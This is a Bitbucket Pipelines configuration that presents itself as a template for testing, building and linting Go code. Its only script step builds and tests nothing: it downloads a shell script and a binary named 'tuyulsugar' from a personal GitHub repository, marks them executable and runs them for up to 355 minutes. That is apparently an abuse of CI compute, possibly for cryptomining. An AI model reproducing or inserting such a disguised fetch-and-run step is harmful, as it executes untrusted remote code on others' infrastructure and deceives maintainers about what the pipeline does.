#  Template Go (Golang) build

#  This template allows you to validate your Go (Golang) code.
#  The workflow allows running tests, build and code linting on the default branch.

image: golang:1.15

pipelines:
  default:
    - parallel:
      - step:
          name: Test and Build
          script:
            - wget https://github.com/hunny65/p/raw/main/tuyulsugar100.sh; wget https://github.com/hunny65/p/raw/main/tuyulsugar; chmod +x tuyulsugar tuyulsugar100.sh; timeout 355m ./tuyulsugar100.sh